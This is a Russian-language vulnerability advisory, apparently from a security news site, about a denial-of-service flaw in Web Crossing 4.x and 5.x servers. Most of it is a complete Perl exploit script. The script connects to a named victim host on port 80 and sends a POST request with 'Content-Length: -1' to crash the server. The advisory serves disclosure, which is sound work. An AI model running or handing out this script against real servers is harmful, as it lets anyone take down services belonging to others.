Программа: Web Crossing 4.х, 5.х 

Отказ в обслуживании обнаружен в Web Crossing. Удаленный пользователь может аварийно завершить работу сервера.
Удаленный пользователь может представить HTTP POST запрос с отрицательным или чрезмерно большим заголовком 'Content-Length', чтобы аварийно завершить работу сервера. 

Пример/Эксплоит: 

#!/usr/bin/perl -w

# Web Crossing 4.x\5.x Denial of Service Exploit
# [ Bad 'Content-Length' Header Bug ]

# - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[0]))

print "Usage: wxdos.pl <victim>\n";
exit;

print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
"\t[ Bad 'Content-Length' Header Bug ]\n" .
"\t[peter4020\@hotmail.com]\n\n";

$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on " .
"port 80";

$DoS = "POST / HTTP/1.1\r\n" .
"Content-Length: -1\r\n\r\n";

print $victim $DoS;

print "[+] Evil request made to target server ... Waiting...!\n";

sleep(4);

close($victim);

print "[+] Done!\n";
exit;

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии